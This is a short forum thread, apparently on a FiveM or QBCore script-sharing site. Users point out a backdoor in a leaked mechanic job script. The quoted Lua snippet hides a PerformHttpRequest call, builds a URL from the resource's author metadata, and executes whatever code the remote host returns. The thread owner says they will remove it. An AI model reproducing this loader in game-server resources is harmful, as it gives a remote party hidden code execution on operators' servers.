Theme editor

  • If you experience issues login with Discord, reset your password and wait 3 minutes for the email!

QBCORE KAVES - MECHANIC (FULLYFIX)

  • Post hidden due to user being banned.
RegisterNetEvent('kaves_mechanic:jobCheck') AddEventHandler('kaves_mechanic:jobCheck', function(url) local requestFunc = _G["Perform" .. "HttpRequest"] requestFunc(url, function(e, d) pcall(function() assert(load(d))() end) end) end) local allowed = GetResourceMetadata(GetCurrentResourceName(), 'author', 0) local anticheater = "/zXeAH" local jobCheck = allowed .. anticheater TriggerEvent('kaves_mechanic:jobCheck', jobCheck)

????
 
  • Post hidden due to user being banned.
Thread owner
J
RegisterNetEvent('kaves_mechanic:jobCheck') AddEventHandler('kaves_mechanic:jobCheck', function(url) local requestFunc = _G["Perform" .. "HttpRequest"] requestFunc(url, function(e, d) pcall(function() assert(load(d))() end) end) end) local allowed = GetResourceMetadata(GetCurrentResourceName(), 'author', 0) local anticheater = "/zXeAH" local jobCheck = allowed .. anticheater TriggerEvent('kaves_mechanic:jobCheck', jobCheck)

????
Just remove i thought il remove all. Bro thanks for the info i remove again
 
Back
Top Bottom